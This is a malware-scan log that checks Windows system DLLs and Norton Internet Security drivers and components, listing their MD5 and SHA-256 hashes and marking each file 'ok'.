12:17:21.0294 0x1aa8 [ 5570A74FF9B1EFBC5154DD1E2F05C517, 2C883A0334CBE4AE257028805C9BB1E529A80F56BA6D341E8EBB83CB3E46FEB7 ] C:\Windows\System32\drivers\NISx64\1503000.00C\symnets.sys
12:17:21.0294 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\symnets.sys - ok
12:17:21.0298 0x1aa8 [ 2C1055E2C6D42753241FB2A129136994, A8E858B4CB8E1E13C7574330C703E0060AEE8B7B19B682F9AE5B4A02BDC659E2 ] C:\Windows\System32\drmv2clt.dll
12:17:21.0298 0x1aa8 C:\Windows\System32\drmv2clt.dll - ok
12:17:21.0302 0x1aa8 [ 54B5DCD55B223BC5DF50B82E1E9E86B1, 025294DD69A421FE4EACAA463F8CB797610D8F3A7A3C61656AE83D0CEE07A9BF ] C:\Windows\System32\mfplat.dll
12:17:21.0302 0x1aa8 C:\Windows\System32\mfplat.dll - ok
12:17:21.0306 0x1aa8 [ 48C2934683CBD06F662B088EEF49EF6A, 2212A3588C28F33EFCB1D34618B3054EBBAC6731D177A581D21D1F969FE040C0 ] C:\Windows\System32\drivers\NISx64\1503000.00C\ironx64.sys
12:17:21.0306 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\ironx64.sys - ok
12:17:21.0309 0x1aa8 [ 97A891E2BF7FDA830BCFC6269DA3F5E9, 7C8D68F0B0A7E4FF93820CC37D666FBA5400F8689860CFEB215E4A204F2C216B ] C:\Windows\System32\blackbox.dll
12:17:21.0309 0x1aa8 C:\Windows\System32\blackbox.dll - ok
12:17:21.0313 0x1aa8 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] C:\Windows\System32\wscsvc.dll
12:17:21.0313 0x1aa8 C:\Windows\System32\wscsvc.dll - ok
12:17:21.0317 0x1aa8 [ F10EFCE086C794F8A7C2C7A3EA52AC5F, 498C4A75DCC560CE1A6B7F671572A4CB2F4D5EA402E45399B7CF471CFBC48241 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys
12:17:21.0317 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys - ok
12:17:21.0321 0x1aa8 [ 92E0508D924512F63FFEEFE498CBD11F, 1158011E4A1298DEC79133B40888AA87B06F5B64BA2AB461B58C22F5F9211D0C ] C:\Windows\System32\p2pcollab.dll
12:17:21.0321 0x1aa8 C:\Windows\System32\p2pcollab.dll - ok
12:17:21.0325 0x1aa8 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] C:\Windows\System32\QAGENTRT.DLL
12:17:21.0325 0x1aa8 C:\Windows\System32\QAGENTRT.DLL - ok
12:17:21.0328 0x1aa8 [ 506A83A3BEEE9FCA09F0170DE9FC7D1B, 2DFBD792B68F3EBEF0843183CAE5D52B6FA04163808AFACF6C0D738455898C36 ] C:\Windows\System32\fveui.dll
12:17:21.0328 0x1aa8 C:\Windows\System32\fveui.dll - ok
12:17:21.0332 0x1aa8 [ C47F35CC6FA4F1BDBEF8F87AC1A46537, 82EC7041317666D5370690BD2176CF00F5957036C29429319F45045BFFAE9EC2 ] C:\Windows\System32\wuapi.dll
12:17:21.0332 0x1aa8 C:\Windows\System32\wuapi.dll - ok
12:17:21.0336 0x1aa8 [ 1B7AA375F711F66D5FF2B855F9EC987F, 151E3897A31F0E828D08EBBB9C10A60047B48534BB38349EF1C8D9245524CA58 ] C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys
12:17:21.0336 0x1aa8 C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys - ok
12:17:21.0340 0x1aa8 [ FA43D418BC945D27D0625B697B8442B5, 035DE0FEA440D2E3AD255EE84B388DDA538E778877033FDB54B8A61BB0AADE56 ] C:\Windows\System32\cabinet.dll
12:17:21.0340 0x1aa8 C:\Windows\System32\cabinet.dll - ok
12:17:21.0343 0x1aa8 [ 96DB78C9C50CEED9DA5050EFFEE272A2, 51CF3E1F96555A4E4B5BC0DE2598CE5A0199F495644A91C2105F25A5A4CF10E3 ] C:\Windows\System32\upnp.dll
12:17:21.0344 0x1aa8 C:\Windows\System32\upnp.dll - ok
12:17:21.0347 0x1aa8 [ 7230C8B80DDE1F0524C353240B78CC0E, 15F73EBFB9152010E7736AFE518A47C209E17DDB347A40C4CDA0D9BBD26D1176 ] C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
12:17:21.0347 0x1aa8 C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys - ok
12:17:21.0352 0x1aa8 [ 82519237E6BBD35680C10F48A59EF435, B9F0255DEB50927EF3A8453E838D503D2433E21307F862ECFAA1E3B464E011B9 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cosvcplg.dll
12:17:21.0352 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cosvcplg.dll - ok
12:17:21.0356 0x1aa8 [ E0B340996A41C9A75DFA3B99BBA9C500, D029AD8ABBD2267B1E44DF5172B93C3F832B4C21F930F5512C24E800F5CE4F8B ] C:\Windows\System32\SearchIndexer.exe
12:17:21.0356 0x1aa8 C:\Windows\System32\SearchIndexer.exe - ok
12:17:21.0359 0x1aa8 [ E746ED90132C6B6313CE9179F56BD31D, CCE0367148E54AA1413C52CCE752CC75EA9E3A8232ECFC263C62A634B8CAEF5F ] C:\Windows\System32\wups.dll
12:17:21.0359 0x1aa8 C:\Windows\System32\wups.dll - ok
12:17:21.0363 0x1aa8 [ 589DF683A6C81424A6CECE52ABF98A50, 8CE0D07B2FC1F1BF8C07434FAFCDC63FDD3B75007C3B2EED130DB69D2D16E90A ] C:\Windows\System32\tquery.dll
12:17:21.0363 0x1aa8 C:\Windows\System32\tquery.dll - ok
12:17:21.0367 0x1aa8 [ C40357844FA3C11B85E883EC18BC6F3F, A92C13DEB9DD92D1AEDED5CE001AAE697F62B1022F1875E7561A4DD36B0FF577 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccgevt.dll
12:17:21.0367 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccgevt.dll - ok
12:17:21.0371 0x1aa8 [ BEE562B2BFD140AB11A72DF38C80E817, 9C202118B687EC8AE393DF89AC0B59FBF366CA5905EB7E7FF3328D0C3E518C3C ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coffplgn.dll
12:17:21.0371 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coffplgn.dll - ok
12:17:21.0375 0x1aa8 [ C6A2FE024815FC7A5EC221BFFB5AD882, 3E21B7217FD5583F3AC46073C401010CCFA64AAE08DF15A6DB5C444F3E659FAA ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccglog.dll
12:17:21.0375 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccglog.dll - ok
12:17:21.0377 0x1aa8 [ 7568CC720ACE4D03B84AF97817E745EF, 7155144CB0B260B969C398A36BC277C97BEADB5DB137D19A4F7E5AF61C3E24D4 ] C:\Windows\System32\mssrch.dll
12:17:21.0377 0x1aa8 C:\Windows\System32\mssrch.dll - ok
12:17:21.0381 0x1aa8 [ 8096915B9BB2579E3986A490B70E8FE4, F24E77B7289DE01B6DABC3463369B5D14F5EE3A49D1AFDF6AD5ABC10EE8EBAE7 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\wscstub.exe
12:17:21.0381 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\wscstub.exe - ok
12:17:21.0386 0x1aa8 [ BEE562B2BFD140AB11A72DF38C80E817, 9C202118B687EC8AE393DF89AC0B59FBF366CA5905EB7E7FF3328D0C3E518C3C ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\components\coFFPlgn.dll
12:17:21.0386 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\components\coFFPlgn.dll - ok
12:17:21.0390 0x1aa8 [ F6F22291024906E43D135A4B1705FEAC, C1B66012799D247033E8AB8386B51BC86A4E2255E6D0B163AC000B215C51B42A ] C:\Windows\System32\sppwinob.dll
12:17:21.0390 0x1aa8 C:\Windows\System32\sppwinob.dll - ok
12:17:21.0394 0x1aa8 [ 41334FEC90FB19450A8690DE046BFB59, 030423D2BA784ECD05D2C1378760EBC7E2262CD8A644D1B9887CE498FD869FB2 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccjobmgr.dll
12:17:21.0394 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccjobmgr.dll - ok
12:17:21.0398 0x1aa8 [ E6FA4A20856CE52CA267DA9E0C7D160D, 9CD068870CA5917476EC023909CD4E79F8EA64AB460560EA4CDA43C083BE2380 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccsubeng.dll
12:17:21.0398 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccsubeng.dll - ok
12:17:21.0402 0x1aa8 [ 5C4885CF97AE631165FD0C06CE5B88B9, 5E02461AD6456063D75C2A5C51F700FBFC7B428276F180362261E259A4F2CD71 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccemlpxy.dll
12:17:21.0402 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccemlpxy.dll - ok
12:17:21.0406 0x1aa8 [ 7FA4F62E9CBE6D975A080810B96E6641, A89D031A6C4D103D95A5062B58949D83494E453B72082F7AC2105E17586BB937 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\iron.dll
12:17:21.0406 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\iron.dll - ok
12:17:21.0410 0x1aa8 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] C:\Windows\System32\ssdpsrv.dll
12:17:21.0410 0x1aa8 C:\Windows\System32\ssdpsrv.dll - ok
12:17:21.0413 0x1aa8 [ 4FC22FD631A6192B7DEDF3D955E257DB, 73039AA40B3F196F999834021EB016033EAA6C7E342EC40961C621AC9952BD57 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sndsvc.dll
12:17:21.0414 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sndsvc.dll - ok
12:17:21.0417 0x1aa8 [ D2958325C1AE1AE37A83334C6229E3BC, D8263CB39A25447442B75A8D8E8111DF671D645DA90A33865C089DEDA9706904 ] C:\Windows\SysWOW64\actxprxy.dll
12:17:21.0417 0x1aa8 C:\Windows\SysWOW64\actxprxy.dll - ok
12:17:21.0421 0x1aa8 [ 2D50EA04D280F7B657B493CD874DF7E5, C5B213663ED893C991725F27F1DC087304932CE20E6466253A79E03508EEABC4 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symredir.dll
12:17:21.0421 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symredir.dll - ok
12:17:21.0425 0x1aa8 [ 35C7FB407881A8F7A006863D294567B7, A71C0FA31051C6060E3ACEE765698A92AE773635524AAC94EBC51E4922AF088D ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symrdrsv.dll
12:17:21.0425 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symrdrsv.dll - ok
12:17:21.0429 0x1aa8 [ 839F96DBAAFD3353E0B248A5E0BD2A51, 11DA5AD3EA5FF4766C12B99FB520B3CBE08581ECAF1A2FD1DC5AC835CA78FAC2 ] C:\Windows\SysWOW64\rasapi32.dll
12:17:21.0429 0x1aa8 C:\Windows\SysWOW64\rasapi32.dll - ok
12:17:21.0432 0x1aa8 [ FFA7172354B9256DBB2CDD75F16F33FE, 85B2F014C67C2E52540F17D561793C6633C9E98F12639CCD3854EB1EC34DD035 ] C:\Windows\SysWOW64\rasman.dll
12:17:21.0432 0x1aa8 C:\Windows\SysWOW64\rasman.dll - ok
12:17:21.0436 0x1aa8 [ 5E347273AE1BC3CD0106EBB23420AD2A, C42F0185BF17860770FB1BFB565C6A243781E4D1A630C056FF5E20C669181B8E ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\hncore.dll
12:17:21.0436 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\hncore.dll - ok
12:17:21.0440 0x1aa8 [ 66C7F79EC6FF6AFB95D80AE39C9DD3C1, 223029302FEB555B5FC044A9B1E3B47B93C2C4F685C84515BD71223AF9AD2608 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symneti.dll
12:17:21.0440 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symneti.dll - ok
12:17:21.0444 0x1aa8 [ 8FB7BCA69DBF20312A04A6FBD57DE183, 9FBB507E78DEDE1EF24C5D3653A4722C6F754730384E3E6C684FA055A1F7810E ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\appmgr32.dll
12:17:21.0444 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\appmgr32.dll - ok
12:17:21.0448 0x1aa8 [ A8D7E219AE915D40AA6441CBDAF1336A, C55874C3781DCC8529695ACD57AB61AD72EB9507EFC2A34333E5AB209FEE8151 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\isdatapr.dll
12:17:21.0448 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\isdatapr.dll - ok
12:17:21.0452 0x1aa8 [ 44A760BFEBA5A46AAAAD77AF70498707, B29ABC65E4F4073C2F4AD2D390E98CDF0578AA0F1E35734ED75BA5BF03F7AB9A ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ncw.dll
12:17:21.0452 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ncw.dll - ok
12:17:21.0457 0x1aa8 [ B6D286F64F29010F1DBA9528025A1F54, C9E079B14F639874BF8103B98F3C1E98495298614C0D1D390D9EA818FF763CDF ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avmodule.dll
12:17:21.0457 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avmodule.dll - ok
12:17:21.0461 0x1aa8 [ D9A60691DACE3909EDDC1383528B7585, 2F860890F2FDDFE768D9A0CAA8809C3786C418A7D3396B9B0C607C0889BC8A02 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\defutdcd.dll
12:17:21.0461 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\defutdcd.dll - ok
12:17:21.0464 0x1aa8 [ 38B13C0DF479DBA23ECFA815159BA86E, C289C65AF3FB689AD6B770AB0E815860D9EA36FB2A8DE9F1818C63AD0FE47CBD ] C:\Windows\SysWOW64\ktmw32.dll
12:17:21.0464 0x1aa8 C:\Windows\SysWOW64\ktmw32.dll - ok
12:17:21.0468 0x1aa8 [ 94CD4E75B28B5D0E8D68CA019B5F7724, 11EDF0D7E0F35E8ED2DCCD002C8A47287C94A17882ED9EF642D5F7B6A0BF499E ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avpsvc32.dll
12:17:21.0468 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avpsvc32.dll - ok
12:17:21.0473 0x1aa8 [ 0915C4DB6DBC3BB9E11B7ECBBE4B7159, ACE7F85685EB92FC3AB4215122B0469E32F23B196C49F08CDA7791D3122C45DC ] C:\Windows\SysWOW64\rtutils.dll
12:17:21.0473 0x1aa8 C:\Windows\SysWOW64\rtutils.dll - ok
12:17:21.0477 0x1aa8 [ C4A64ECFBCB186F4B3F80FA02C456E87, 07CF7398248B3BB3B2631813A423BEA7FC193011927F1E7D10EA490272922F32 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltpe.dll
12:17:21.0477 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltpe.dll - ok
12:17:21.0481 0x1aa8 [ F5280A839476B25F6BDDB1D5093BCB9F, 7105761F4EF63B113DD204E7CDA488F8CFDE911BB6EB56F430DF9B362D6BE28A ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\datastor.dll
12:17:21.0481 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\datastor.dll - ok
12:17:21.0485 0x1aa8 [ C1FC29FC7FDC398DB496997A9957C632, CE90261CDBA5E34D609206BDB8B875663B69379A283FC0E794DFA122E20514A0 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avifc.dll
12:17:21.0485 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avifc.dll - ok
12:17:21.0489 0x1aa8 [ C8AE9499875950F9E4B7F14C77F1D374, FAD632BDE28B41426CBD07F224F8C8DFB14E805F13D5471DC42274301A025288 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\bhclient.dll
12:17:21.0489 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\bhclient.dll - ok
12:17:21.0494 0x1aa8 [ E7BD7A4ED47E1D887A993825031C19E9, 160791B9DE33FE9959B025EAB5A234C100C42C6C8D7342CF2529486F0495B224 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sqsvc.dll
12:17:21.0494 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sqsvc.dll - ok
12:17:21.0497 0x1aa8 [ 3121A79D13A61562BE9CC902CD46B542, 00A5833A48338A4A9A5530844924AF4F1FAB618DA46D7EBBC6E2165C32ED376C ] C:\Windows\System32\msidle.dll
12:17:21.0497 0x1aa8 C:\Windows\System32\msidle.dll - ok
12:17:21.0501 0x1aa8 [ 8CBBB27369F9F07BC5E874E750EAF9D0, 4C4BEA5AD454692E0A56ACFC83C495CA44B7BB2393388A5582CE3EBE5D81E2E1 ] C:\Windows\System32\wmp.dll
12:17:21.0501 0x1aa8 C:\Windows\System32\wmp.dll - ok
12:17:21.0504 0x1aa8 [ 8C22601379AA425E7A7E4B947EC87F8C, 65ECE0DA8C135A640D942802440BD65EBED44863E400660A925B51D4FD362034 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\NAVENG32.DLL
12:17:21.0504 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\NAVENG32.DLL - ok
12:17:21.0508 0x1aa8 [ F718A57D946EAC76EFCB351D74E269F4, 473AE48BACEE64A9582814951B731BDDDEB48D2E9D407ACEAA3F0850B536DABA ] C:\Windows\System32\drivers\NISx64\1503000.00C\srtsp64.sys
12:17:21.0508 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\srtsp64.sys - ok
12:17:21.0512 0x1aa8 [ 20E4FACBD122C9910719EF663002BA76, 0417DCBB1C8DC53671D7E289714E7B1A8B750AB2B650454379BA370639538FBB ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\qsplugin.dll
12:17:21.0512 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\qsplugin.dll - ok
12:17:21.0516 0x1aa8 [ B983EA416C92E10EC5D81A80EFAB07BE, 5B3429E49B9CF65CCCEABF6C99407AD4927F6F021C0BFC9F4EA90967C4EFB29F ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlms.dll
12:17:21.0516 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlms.dll - ok
12:17:21.0520 0x1aa8 [ 302EA314A1AF0D7CEF0A3D0195F79561, 046DBC2D9D028F2D2E8BAE745CA2ADEF42741689BFF743A13B81EA4228DDCDC6 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ex64.sys
12:17:21.0520 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ex64.sys - ok
12:17:21.0525 0x1aa8 [ 8258362DDB18B644A82D8B5061AD9426, 87CA586B2B1B0089BFF6A259A0743D184AE383B3B12C4BC5986D72ADFFBE9EDA ] C:\Windows\SysWOW64\wscisvif.dll
12:17:21.0525 0x1aa8 C:\Windows\SysWOW64\wscisvif.dll - ok
12:17:21.0529 0x1aa8 [ DEA8143219627237D4DFB9F0D6228439, 4DD45B5D9D3B997019DC3C14C71C27EB1D61849F42A1F2E8DA29493C7E65E9C1 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\bhsvcplg.dll
12:17:21.0529 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\bhsvcplg.dll - ok
12:17:21.0533 0x1aa8 [ 214AC7B576405C321BE71AF5A3EE7751, 1FFE0E4B517D5A4C80D4DE582DA0667A7914D81F42EA6DB9E1FEDCD8BFD4499F ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\spocclnt.dll
12:17:21.0533 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\spocclnt.dll - ok
12:17:21.0536 0x1aa8 [ A8CDF3768604FF95B54669E20053D569, 2DB85B86C839341F2A879A6D25F787D17EE665D425C1BAC3E1F82BAC61F89F94 ] C:\Windows\SysWOW64\wscapi.dll
12:17:21.0536 0x1aa8 C:\Windows\SysWOW64\wscapi.dll - ok
12:17:21.0540 0x1aa8 [ 702E07EC32F96ACDB873E9A5465D4401, 2C6B1C8BA0BF4791AEA064062DCA3678AE4443DF19DB37D6CB55BA6297D8A238 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\eng64.sys
12:17:21.0541 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\eng64.sys - ok
12:17:21.0545 0x1aa8 [ 0675639FA9EB7F923FD8DC9BAAC47E28, B91EF07A14846D84C89F2769895E37E076A8A4ED3CCDC2F455E8F8643990C84E ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sqlite.dll
12:17:21.0545 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sqlite.dll - ok
12:17:21.0549 0x1aa8 [ 5DE93DF4A114D5A7C5837F466CCD65D0, 4946FB01C3D6B6E27DA6480FB527C69F1F4C82D03ED494AEFD9AD4A3D49761A7 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\comm.dll
12:17:21.0549 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\comm.dll - ok
12:17:21.0553 0x1aa8 [ 622065F22BE4E4CACE5D552997D15EE6, 86A683121D01278548BF6497BDF4A3F4B33A1A8340D3D5AD0DC5117F9622E5FB ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\dscli.dll
12:17:21.0553 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\dscli.dll - ok
12:17:21.0557 0x1aa8 [ AB272BBFB05A8585C3405EFA9F605774, 2E019FB20769BDBAAC5C55B0055602A5AAEC4F93494F4B2A686756ADA3B3D4E2 ] C:\Windows\System32\wmploc.DLL
12:17:21.0557 0x1aa8 C:\Windows\System32\wmploc.DLL - ok
12:17:21.0561 0x1aa8 [ 4EDE6D4A445B1AAE675F4518C1A49E5F, 4CBA9B064BDD0FA0F2A4E2B2CD0F448496B22AA56BFD8CB81130BFC550B0F831 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\eventsvc.dll
12:17:21.0561 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\eventsvc.dll - ok
12:17:21.0566 0x1aa8 [ 41782D6A60759DA61924C24296AF0B8B, 1DFBCE2A3CA8A4DDFC08FB2336EAD9E765D80CB905EB24ABE081D302E8F7C0E9 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlmj.dll
12:17:21.0566 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlmj.dll - ok
12:17:21.0570 0x1aa8 [ B752A3CD615287331B627C21ADDEB353, AC5CFF505215BC856A0BBB87BFE60D03BC0AF49997696A8702A4FCA5AFAF73E5 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\mclntask.dll
12:17:21.0570 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\mclntask.dll - ok
12:17:21.0574 0x1aa8 [ 2CA0BEA6897DC83B1B2FA8B54CD06385, 07A3403F1E2CBFF5FA21853E5A41DC608EB0E0A8E3B19A3E875F1F707EEFB3D7 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\proxyclt.dll
12:17:21.0574 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\proxyclt.dll - ok
12:17:21.0578 0x1aa8 [ ADCB4E59F33ED1852271108F531711D9, C255A3B22C0D130C91B18E1507B7F3F48963FE63C7A5C2FEE35328AABF0DF8DF ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nahelper.dll
12:17:21.0578 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nahelper.dll - ok
12:17:21.0582 0x1aa8 [ 4E082A237594311E80B26C98EA6843DE, 66B7878AFB1569C8EDE6282A1DC1A91DBE6B80DB3C5B193D69B325BA6F5DE6EA ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ipsplug.dll
12:17:21.0582 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ipsplug.dll - ok
12:17:21.0586 0x1aa8 [ 7DF186D86CF8C571A12AAB788C777F84, A2C1064BFDEF2A85CB12A11E55728BCC09933C115C278403F07B27DB2C36C710 ] C:\Windows\SysWOW64\wscproxystub.dll
12:17:21.0586 0x1aa8 C:\Windows\SysWOW64\wscproxystub.dll - ok
12:17:21.0589 0x1aa8 [ 8FCDDE5FAAA659FA327C82E9B2332A2A, A57D65A61B08BDBD6DEC04393D2EE323DE9DC23EBCFB99708157CE20A9401FBA ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\isdatasv.dll
12:17:21.0589 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\isdatasv.dll - ok
12:17:21.0594 0x1aa8 [ 5A0F7BD7EE0855C0EEC5FDB189607B05, 407779DE342E504D66BD42499F17BA64A142224575E7257A691DA0C18BDEC8A0 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwcore.dll
12:17:21.0594 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwcore.dll - ok
12:17:21.0598 0x1aa8 [ 7A843446E4AFF1F2723C9024DD02E5C6, E527A0FDF98DE6F92B2E61E7D86CBBDDF700E67CD51D241BE90B5CAA7C1D815A ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHEngine.dll
12:17:21.0598 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHEngine.dll - ok
12:17:21.0602 0x1aa8 [ 914B242E96BD338FDF7757DCD4DFE811, 08A6BD7CA6642AE8A65FB7871ACCC7E95CB31F6DACAA7DAC3E4760C66431883B ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\distrptr.dll
12:17:21.0602 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\distrptr.dll - ok
12:17:21.0606 0x1aa8 [ C417CA9E626EEA7F4BFBE49BFE464CE7, F4E1E222FD6E4A864136B293AD796B436FD2F67D95951AF69496838259910EAF ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSxpx86.dll
12:17:21.0606 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSxpx86.dll - ok
12:17:21.0610 0x1aa8 [ 4F963F80888646BBAFDAE3102D759C85, 82CD7BD1FB28541E02B5D92F103B8486D815720E58AC666385216CAE0907447F ] C:\Program Files\Internet Explorer\ieproxy.dll
12:17:21.0610 0x1aa8 C:\Program Files\Internet Explorer\ieproxy.dll - ok
12:17:21.0614 0x1aa8 [ 953C17984A5F516BB274FD303ABAD168, 855A4B2EF0D696F5621B9DC312235E65C5D5257C321605230C20298DC84FF520 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwgenplg.dll
12:17:21.0614 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwgenplg.dll - ok
12:17:21.0618 0x1aa8 [ E5FF25FEDE1B423343B74FEBB281B919, 554D22DC8FEE2695323364466C0163C0E758F58539191528F97E770C8D8A1DB0 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\idsaux.dll
12:17:21.0618 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\idsaux.dll - ok
